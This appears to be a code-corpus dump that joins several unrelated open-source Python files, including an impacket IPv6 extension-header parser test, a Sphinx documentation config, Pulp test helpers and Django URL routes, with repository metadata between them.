routing_options_segments_left = routing_options_parsed_packet.get_segments_left()
routing_options_options = routing_options_parsed_packet.get_options()
# Destination Options Parsing
destination_options_parsed_packet = routing_options_parsed_packet.child()
destination_options_next_header = destination_options_parsed_packet.get_next_header()
destination_options_header_extension_length = destination_options_parsed_packet.get_header_extension_length()
destination_options_options = destination_options_parsed_packet.get_options()
self.assertEquals(2, len(destination_options_options), "Destination Options Parsing - Wrong Quantity of Options")
destination_options_pad1_option = destination_options_options[0]
destination_options_pad1_option_type = destination_options_pad1_option.get_option_type()
destination_options_padn_option = destination_options_options[1]
destination_options_padn_option_type = destination_options_padn_option.get_option_type()
destination_options_padn_option_length = destination_options_padn_option.get_option_length()
self.assertEquals(ipv6_protocol_version, 6, "IP6 parsing - Incorrect protocol version")
self.assertEquals(ipv6_traffic_class, 72, "IP6 parsing - Incorrect traffic class")
self.assertEquals(ipv6_flow_label, 148997, "IP6 parsing - Incorrect flow label")
self.assertEquals(ipv6_payload_length, 1500, "IP6 parsing - Incorrect payload length")
self.assertEquals(ipv6_next_header, 0, "IP6 parsing - Incorrect next header")
self.assertEquals(ipv6_hop_limit, 1, "IP6 parsing - Incorrect hop limit")
self.assertEquals(ipv6_source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address")
self.assertEquals(ipv6_destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address")
self.assertEquals(hop_by_hop_parsed_packet.get_header_type(), 0, "Hop By Hop Parsing - Incorrect packet")
self.assertEquals(hop_by_hop_next_header, 43, "Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(hop_by_hop_header_extension_length, 1, "Hop By Hop Parsing - Incorrect size")
self.assertEquals(hop_by_hop_padn_option_type, 1, "Hop By Hop Parsing - Incorrect option type")
self.assertEquals(hop_by_hop_padn_option_length, 12, "Hop By Hop Parsing - Incorrect option size")
self.assertEquals(routing_options_parsed_packet.get_header_type(), 43, "Routing Options Parsing - Incorrect packet")
self.assertEquals(routing_options_next_header, 60, "Routing Options Parsing - Incorrect next header value")
self.assertEquals(routing_options_header_extension_length, 0, "Routing Options Parsing - Incorrect size")
self.assertEquals(routing_options_routing_type, 0, "Routing Options Parsing - Incorrect routing type")
self.assertEquals(routing_options_segments_left, 10, "Routing Options Parsing - Incorrect quantity of segments left size")
self.assertEquals(0, len(routing_options_options), "Routing Options Parsing - Wrong Quantity of Options")
self.assertEquals(destination_options_parsed_packet.get_header_type(), 60, "Destination Options Parsing - Incorrect packet")
self.assertEquals(destination_options_next_header, 58, "Destination Options Parsing - Incorrect next header value")
self.assertEquals(destination_options_header_extension_length, 0, "Destination Options Parsing - Incorrect size")
self.assertEquals(destination_options_pad1_option_type, 0, "Destination Options Parsing - Incorrect option type")
self.assertEquals(destination_options_padn_option_type, 1, "Destination Options Parsing - Incorrect option type")
self.assertEquals(destination_options_padn_option_length, 3, "Destination Options Parsing - Incorrect option size")
def test_decoding_extension_header_from_string(self):
hop_by_hop_binary_packet = '\x2b\x01\x01\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Simple Hop By Hop Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Hop By Hop Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Hop By Hop Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Hop By Hop Parsing - Incorrect option size")
suite = unittest.TestLoader().loadTestsFromTestCase(TestIP6)
unittest.TextTestRunner(verbosity=2).run(suite)
|
prasadtalasila/INET-Vagrant-Demos
|
Nonce_Demo/impacket-0.9.12/impacket/testcases/ImpactPacket/test_IP6_Extension_Headers.py
|
Python
|
gpl-2.0
| 28,928
|
# coding = utf-8
import sys
import os
import datetime
import logging
sys.path.append(os.path.abspath('..'))
# import pre processing / impact analysis
from main_dalla_auto import main_impact_analysis
from main_dalla_auto import main_impact_analysis_update
from header_config_variable import std_time_format
from jaksafe import db_con
from jaksafe import qgis_install_path
from auto_preprocessing.auto_calc_function import *
import Time as t
# import post processing
import post_processing.config as config_post
import post_processing.run as run_post
# Package QGIS
from qgis.core import *
import qgis.utils
table_name_autocalc = global_conf_parser.get('database_configuration','table_name_autocalc')
if __name__ == '__main__':
############################################################################
# IMPACT ANALYSIS
# Set current time
t0_s = datetime.datetime.strftime(datetime.datetime.now(),std_time_format)
t0_s = t.Time(t0_s)
# Defining t1 and t0
t1 = t.Time('20150203235959')
t0 = t.Time(t1.timeStamp()-(6*3600))
# Convert to formatted time
t1 = t1.formattedTime()
t0 = t0.formattedTime()
# logging configuration
time_0 = config_post.time_formatter(t0, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
time_1 = config_post.time_formatter(t1, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
path = config_post.Path(time_0, time_1)
if not os.path.isdir(path.log_dir):
os.makedirs(path.log_dir)
log_file = path.log_dir + 'dala_' + time_0 + '_' + time_1 + '.log'
logger = logging.getLogger('jakservice')
logger.setLevel('INFO')
fh = logging.FileHandler(log_file)
logger.addHandler(fh)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.info('AWAL PERHITUNGAN DALA')
logger.info('AWAL IMPACT ANALYSIS')
## default damage and loss
last_row_id = 0
# impact analysis module
try:
QgsApplication.setPrefixPath(qgis_install_path, True)
QgsApplication.initQgis()
# folder_output,t0_update = main_impact_analysis(t0,t1,db_con)
folder_output,t0_update = main_impact_analysis_update(t0,t1,db_con)
t0 = t0_update
except Exception, e:
logger.error(e)
# print 'error: %s' %e
sys.exit(1)
## Creating and writing auto calculation summary
try:
t1_s = datetime.datetime.strftime(datetime.datetime.now(),std_time_format)
t1_s = t.Time(t1_s)
last_row_id = create_summary_auto_calculation(t0,t1,db_con,table_name_autocalc,folder_output)
print "Last row id time = %d"%last_row_id
except Exception,e:
logger.error(e)
# print e
sys.exit(1)
db_con.close()
logger.info('AKHIR IMPACT ANALYSIS')
############################################################################
# POST PROCESSING
# normalize time format
# t0 = config_post.time_formatter(t0, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
# t1 = config_post.time_formatter(t1, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
#
# # daftar subsektor
# o_list = config_post.ListSubsektor()
# list_subsektor = o_list.subsektor
#
# try:
# run_post.main(t0, t1, list_subsektor, last_row_id)
# QgsApplication.exitQgis()
# except Exception, e:
# logger.exception(e)
# pass
#
# logger.info('AKHIR PERHITUNGAN DALA')
|
frzdian/jaksafe-engine
|
jaksafe/jaksafe/jakservice/tests/test_auto_new_filename.py
|
Python
|
gpl-2.0
| 3,433
|
# This file is part of Merlin.
# Merlin is the Copyright (C)2008,2009,2010 of Robin K. Hansen, Elliot Rosemarine, Andreas Jacobsen.
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# List of package modules
__all__ = [
"mydef",
"showdef",
"searchdef",
"usedef",
"logdef",
]
|
ellonweb/merlin
|
Hooks/mydef/__init__.py
|
Python
|
gpl-2.0
| 1,146
|
"""
GravMag: Use the polynomial equivalent layer to upward continue gravity data
"""
from fatiando.gravmag import prism, sphere
from fatiando.gravmag.eqlayer import PELGravity, PELSmoothness
from fatiando import gridder, utils, mesher
from fatiando.vis import mpl
# Make synthetic data
props = {'density':1000}
model = [mesher.Prism(-500, 500, -1000, 1000, 500, 4000, props)]
shape = (50, 50)
x, y, z = gridder.regular([-5000, 5000, -5000, 5000], shape, z=0)
gz = utils.contaminate(prism.gz(x, y, z, model), 0.1)
# Setup the layer
layer = mesher.PointGrid([-5000, 5000, -5000, 5000], 200, (100, 100))
# Estimate the density using the PEL (it is faster and more memory efficient
# than the traditional equivalent layer).
windows = (20, 20)
degree = 1
solver = (PELGravity(x, y, z, gz, layer, windows, degree) +
10**-21*PELSmoothness(layer, windows, degree)).fit()
layer.addprop('density', solver.estimate_)
residuals = solver.residuals()
print "Residuals:"
print "mean:", residuals.mean()
print "stddev:", residuals.std()
# Plot the layer and the fit
mpl.figure(figsize=(14, 4))
mpl.subplot(1, 3, 1)
mpl.axis('scaled')
mpl.title('Layer (kg.m^-3)')
mpl.pcolor(layer.y, layer.x, layer.props['density'], layer.shape)
mpl.colorbar()
mpl.m2km()
mpl.subplot(1, 3, 2)
mpl.axis('scaled')
mpl.title('Fit (mGal)')
levels = mpl.contour(y, x, gz, shape, 15, color='r')
mpl.contour(y, x, solver.predicted(), shape, levels, color='k')
mpl.m2km()
mpl.subplot(1, 3, 3)
mpl.title('Residuals (mGal)')
mpl.hist(residuals, bins=10)
mpl.show()
# Now I can forward model the layer at a greater height and check against the
# true solution of the prism
gz_true = prism.gz(x, y, z - 500, model)
gz_up = sphere.gz(x, y, z - 500, layer)
mpl.figure()
mpl.axis('scaled')
mpl.title('True (red) | Layer (black)')
levels = mpl.contour(y, x, gz_true, shape, 12, color='r')
mpl.contour(y, x, gz_up, shape, levels, color='k')
mpl.m2km()
mpl.show()
|
seancug/python-example
|
fatiando-0.2/cookbook/gravmag_eqlayer_pel_upcontinue.py
|
Python
|
gpl-2.0
| 1,927
|
from copy import deepcopy
import mock
from pulp.common.compat import unittest
from pulp.server.async import celery_instance
from pulp.server.db.model import TaskStatus, ReservedResource, Worker
from pulp.server.managers import factory as manager_factory
from pulp.server.managers.auth.cert.cert_generator import SerialNumber
SerialNumber.PATH = '/tmp/sn.dat'
class PulpServerTests(unittest.TestCase):
"""
Base functionality for all Pulp server-side unit tests. This should be used
in nearly all cases outside of the controllers.
"""
@classmethod
def setUpClass(cls):
manager_factory.initialize()
# This will make Celery tasks run synchronously
celery_instance.celery.conf.CELERY_ALWAYS_EAGER = True
def setUp(self):
super(PulpServerTests, self).setUp()
self._mocks = {}
self.clean()
def tearDown(self):
super(PulpServerTests, self).tearDown()
self.unmock_all()
self.clean()
def clean(self):
pass
def mock(self, parent, attribute, mock_object=None):
self._mocks.setdefault(parent, {})[attribute] = getattr(parent, attribute)
if mock_object is None:
mock_object = mock.Mock()
setattr(parent, attribute, mock_object)
def unmock_all(self):
for parent in self._mocks:
for mocked_attr, original_attr in self._mocks[parent].items():
setattr(parent, mocked_attr, original_attr)
class RecursiveUnorderedListComparisonMixin(object):
"""
This mixin adds an assert_equal_ignoring_list_order, which is handy for comparing data
structures that are or contain lists wherein the ordering of the lists is not
significant.
"""
def assert_equal_ignoring_list_order(self, a, b):
"""
This method will compare items a and b recursively for equality, without taking
into consideration ther ordering of any lists found inside them. For example, the
following objects would be considered equal:
a = {'a_list': ['a', 'b', 'c']}
b = {'a_list': ['b', 'a', 'c']}
:param a: An object you wish to compare to b
:type a: object
:param b: An object you wish to compare to a
:type b: object
"""
def _sort_lists(a):
"""
Traverse the given object, a, and sort all lists and tuples found in the
structure.
:param a: A structure to traverse for lists, sorting them
:type a: object
:return: A representation of a that has all lists sorted
:rtype: object
"""
if isinstance(a, (list, tuple)):
# We don't want to alter the original a, so make a deepcopy
a = list(deepcopy(a))
for index, item in enumerate(a):
a[index] = _sort_lists(item)
a = sorted(a)
elif isinstance(a, dict):
for key, value in a.items():
a[key] = _sort_lists(value)
return a
self.assertEqual(_sort_lists(a), _sort_lists(b))
class TestRecursiveUnorderedListComparisonMixin(unittest.TestCase,
RecursiveUnorderedListComparisonMixin):
"""
Tests for the RecursiveUnorderedListComparisonMixin.
"""
def test_assert_equal_ignoring_list_order(self):
"""
Ensure that the recursive unordered list assertion works as expected.
"""
self.assert_equal_ignoring_list_order([1, 2, 3], [2, 1, 3])
# Test lists embedded in dictionaries
self.assert_equal_ignoring_list_order({'a_list': [1, 2, 3]}, {'a_list': [2, 1, 3]})
# Test lists of lists
self.assert_equal_ignoring_list_order([[1, 2], [3]], [[3], [2, 1]])
# These should fail
# The second list has an extra element
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
[1, 2, 3], [2, 1, 3, 3])
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
{'a_list': [1, 2, 3]}, {'a_list': [2, 1]})
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
[[1, 2], [3]], [[3, 3], [2, 1]])
class ResourceReservationTests(PulpServerTests):
def tearDown(self):
Worker.objects().delete()
ReservedResource.objects.delete()
TaskStatus.objects().delete()
|
rbarlow/pulp
|
server/test/unit/base.py
|
Python
|
gpl-2.0
| 4,543
|
# -*- coding: utf-8 -*-
#
# Percona XtraBackup documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 27 22:27:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.extlinks', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.ifconfig']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Percona XtraBackup'
copyright = u'2009-2016, Percona LLC and/or its affiliates'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.3.4'
# The full version, including alpha/beta/rc tags.
release = '2.3.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
rst_prolog = '''
.. |check| replace:: ``|[[---CHECK---]]|``
.. |xtrabackup| replace:: :program:`xtrabackup`
.. |innobackupex| replace:: :program:`innobackupex`
.. |xbstream| replace:: :term:`xbstream`
.. |xbcrypt| replace:: :term:`xbcrypt`
.. |XtraDB| replace:: :term:`XtraDB`
.. |InnoDB| replace:: :term:`InnoDB`
.. |MyISAM| replace:: :term:`MyISAM`
.. |Percona Toolkit| replace:: *Percona Toolkit*
.. |LSN| replace:: :term:`LSN`
.. |XtraBackup| replace:: *Percona XtraBackup*
.. |Percona XtraBackup| replace:: *Percona XtraBackup*
.. |Percona XtraDB Cluster| replace:: *Percona XtraDB Cluster*
.. |Percona Server| replace:: *Percona Server*
.. |Percona| replace:: *Percona*
.. |MySQL| replace:: *MySQL*
.. |MariaDB| replace:: *MariaDB*
.. |tar4ibd| replace:: :program:`tar4ibd`
.. |tar| replace:: :program:`tar`
.. |xbcloud| replace:: *xbcloud*
'''
extlinks = {'bug': ('https://bugs.launchpad.net/percona-xtrabackup/+bug/%s',
'#'), 'mysqlbug': ('http://bugs.mysql.com/bug.php?id=%s',
'#')}
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'percona-theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.', './percona-theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Percona XtraBackup 2.3 Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Percona XtraBackup 2.3 Documentation'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'percona-xtrabackup-logo.jpg'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'percona_favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['localtoc.html', 'sourcelink.html'],
'using/windows': ['windowssidebar.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerconaXtraBackupDocumentation'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PerconaXtraBackup-2.3.tex', u'Percona XtraBackup 2.3 Documentation',
u'Percona LLC and/or its affiliates', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'percona-logo.jpg'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
latex_elements = {
'classoptions': ',oneside',
'babel': '\\usepackage[english]{babel}'
}
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('xtrabackup_bin/xtrabackup_binary', 'xtrabackup', u'Percona XtraBackup 2.3 Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('innobackupex/innobackupex_script', 'innobackupex', u'innobackupex Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('xbcrypt/xbcrypt', 'xbcrypt', u'Percona xbcrypt Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('xbstream/xbstream', 'xbstream', u'Percona xbstream Documentation',
[u'Percona LLC and/or its affiliates'], 1)
]
|
janlindstrom/percona-xtrabackup
|
storage/innobase/xtrabackup/doc/source/conf.py
|
Python
|
gpl-2.0
| 9,044
|
# Beah - Test harness. Part of Beaker project.
#
# Copyright (C) 2009 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.internet import reactor
from beah.wires.internals.twadaptors import ControllerAdaptor_Backend_JSON
from beah.wires.internals.twmisc import twisted_logging, connect_loopback
from beah import config
from beah.misc import make_log_handler, str2log_level, localhost_, parse_bool
import os
import logging
################################################################################
# FACTORY:
################################################################################
class BackendFactory(ReconnectingClientFactory):
def __init__(self, backend, controller_protocol, byef=None):
self.backend = backend
self._done = False
byef_ = byef or (lambda evt: reactor.callLater(1, reactor.stop))
def proc_evt_bye(evt):
self._done = True
if backend.controller:
backend.controller.transport.loseConnection()
byef_(evt)
backend.proc_evt_bye = proc_evt_bye
self.controller_protocol = controller_protocol
# set up ReconnectingClientFactory:
# we do not want test killed by watchdog. repeat at least every 120s.
self.maxDelay = 120
def linfo(self, fmt, *args, **kwargs):
l = [self.__class__.__name__]
l.extend(args)
logging.getLogger('backend').info('%s: '+fmt, *l, **kwargs)
########################################
# INHERITED METHODS:
########################################
def startedConnecting(self, connector):
self.linfo('Attempting to connect to beah backend')
def buildProtocol(self, addr):
self.linfo('Connected to beah backend on address %r', addr)
self.linfo('Resetting reconnection delay')
self.resetDelay()
controller = self.controller_protocol()
controller.add_backend(self.backend)
return controller
def clientConnectionLost(self, connector, reason):
self.linfo('Connection to beah backend on %s lost: %s', connector.getDestination(), reason)
self.backend.set_controller()
if not self._done:
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
def clientConnectionFailed(self, connector, reason):
self.linfo('Connection to beah backend on %s failed: %s', connector.getDestination(), reason)
self.backend.set_controller()
if not self._done:
ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)
def log_handler(log_file_name=None):
conf = config.get_conf('beah-backend')
if not log_file_name:
if conf.has_option('DEFAULT', 'LOG_FILE'):
log_file_name = conf.get('DEFAULT', 'LOG_FILE')
else:
log_file_name = conf.get('DEFAULT', 'NAME') + '.log'
lp = conf.get('DEFAULT', 'LOG_PATH') or "/var/log"
log = logging.getLogger('backend')
twisted_logging(log, level=logging.WARNING)
make_log_handler(log, lp, log_file_name, syslog=True,
console=parse_bool(conf.get('DEFAULT', 'CONSOLE_LOG')))
log.setLevel(str2log_level(conf.get('DEFAULT', 'LOG')))
return log
def start_backend(backend, host=None, port=None,
adaptor=ControllerAdaptor_Backend_JSON,
byef=None):
conf = config.get_conf('beah-backend')
host = host or conf.get('DEFAULT', 'INTERFACE')
port = port or conf.get('DEFAULT', 'PORT')
if os.name == 'posix':
socket = conf.get('DEFAULT', 'SOCKET')
# 0. check SOCKET_OPT (socket given on command line)
if parse_bool(conf.get('DEFAULT', 'SOCKET_OPT')) and socket != '':
port = ''
# 1. check INTERFACE - if not empty nor localhost: must use TCP
if not localhost_(host):
socket = ''
# 2. check PORT_OPT (port given on command line)
if parse_bool(conf.get('DEFAULT', 'PORT_OPT')) and port != '':
socket = ''
else:
socket = ''
backend_factory = BackendFactory(backend, adaptor, byef)
if socket != '':
return reactor.connectUNIX(socket, backend_factory)
elif port and host:
return reactor.connectTCP(host, int(port), backend_factory)
elif port:
if not parse_bool(conf.get('DEFAULT', 'IPV6_DISABLED')):
return connect_loopback(int(port),
backend_factory)
else:
return connect_loopback(int(port),
backend_factory,
ipv6_disabled=True)
else:
raise EnvironmentError('Either socket or port must be configured.')
################################################################################
# TEST:
################################################################################
if __name__=='__main__':
from beah.core.backends import PprintBackend
from beah.core import command
class DemoOutAdaptor(ControllerAdaptor_Backend_JSON):
def linfo(self, fmt, *args, **kwargs):
l = [self.__class__.__name__]
l.extend(args)
logging.getLogger('backend').info('%s: '+fmt, *l, **kwargs)
def connectionMade(self):
self.linfo("I am connected!")
ControllerAdaptor_Backend_JSON.connectionMade(self)
self.proc_cmd(self.backend, command.PING("Hello everybody!"))
def connectionLost(self, reason):
self.linfo("I was lost!")
def lineReceived(self, data):
self.linfo('Data received. Data: %r', data)
ControllerAdaptor_Backend_JSON.lineReceived(self, data)
class DemoPprintBackend(PprintBackend):
def set_controller(self, controller=None):
PprintBackend.set_controller(self, controller)
if controller:
self.controller.proc_cmd(self, command.ping("Are you there?"))
config.backend_conf(
defaults={'NAME':'beah_demo_backend'},
overrides=config.backend_opts())
log_handler()
start_backend(DemoPprintBackend(), adaptor=DemoOutAdaptor)
reactor.run()
|
beaker-project/beah
|
beah/wires/internals/twbackend.py
|
Python
|
gpl-2.0
| 6,906
|
"""
DDTSS-Django - A Django implementation of the DDTP/DDTSS website.
Copyright (C) 2011-2014 Martijn van Oosterhout <kleptog@svana.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from django.conf.urls import patterns, include, handler500, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()
from ddtp.ddtp_web import views as ddt_views
from ddtp.ddtss import urls as ddtss_urls
# Pyflakes
handler500
urlpatterns = patterns(
'',
url(r'^$', ddt_views.view_index, name='ddt_index'),
url(r'^(\w).html', ddt_views.view_browse, name='ddt_overview'),
url(r'^package/([\w.+-]+)$', ddt_views.view_package, name='ddt_package'),
url(r'^source/([\w.+-]+)$', ddt_views.view_source, name='ddt_source'),
url(r'^descr/(\d+)$', ddt_views.view_descr, name='ddt_descr'),
url(r'^part/(\w+)$', ddt_views.view_part, name='ddt_part'),
url(r'^part/(\w+)/(\w+)$', ddt_views.view_onepart, name='ddt_onepart'),
url(r'^stats/milestones/(\w+)$', ddt_views.stats_milestones_lang, name='ddt_stats_milestones_lang'),
url(r'^stats/milestones/(\w+)/(.+)$', ddt_views.stats_one_milestones_lang, name='ddt_stats_one_milestones_lang'),
url(r'^descr/(\d+)/(\w+)$', ddt_views.view_transdescr, name='ddt_transdescr'),
url(r'^ddtss/', include(ddtss_urls)),
url(r'^robots.txt$', ddt_views.block_robots),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^static/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
|
kleptog/DDTSS-Django
|
src/ddtp/urls.py
|
Python
|
gpl-2.0
| 2,176
|
# -*- coding: utf-8 -*-
#
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from invenio.modules.indexer import fixtures as default
"""Update IdxINDEXData fixtures.
.. code-block:: sql
UPDATE idxINDEX SET stemming_language='en' WHERE name
IN ('global','abstract','keyword','title','fulltext' ,'miscellaneous')
"""
for name in dir(default.IdxINDEXData):
if not name.startswith('IdxINDEX_'):
continue
index = getattr(default.IdxINDEXData, name)
if hasattr(index, name) and index.name in (
'global','abstract','keyword','title','fulltext', 'miscellaneous'):
index.stemming_language = u'en'
|
jirikuncar/invenio-demosite
|
invenio_demosite/base/fixtures/indexer.py
|
Python
|
gpl-2.0
| 1,354
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2008-2012 Wolfgang Rohdewald <wolfgang@rohdewald.de>
kajongg is free software you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import sys
from collections import defaultdict
from util import logException, logWarning, m18n, m18nc, m18nE
from common import WINDS, InternalParameters, elements, IntDict, Debug
from query import Transaction, Query
from tile import Tile
from meld import Meld, CONCEALED, PUNG, hasChows, meldsContent
from hand import Hand
class Players(list):
"""a list of players where the player can also be indexed by wind.
The position in the list defines the place on screen. First is on the
screen bottom, second on the right, third top, forth left"""
allNames = {}
allIds = {}
def __init__(self, players=None):
list.__init__(self)
if players:
self.extend(players)
